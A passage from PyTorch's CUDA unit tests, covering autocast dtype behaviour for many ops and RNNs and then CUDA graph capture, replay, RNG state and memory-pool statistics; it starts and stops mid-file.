self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
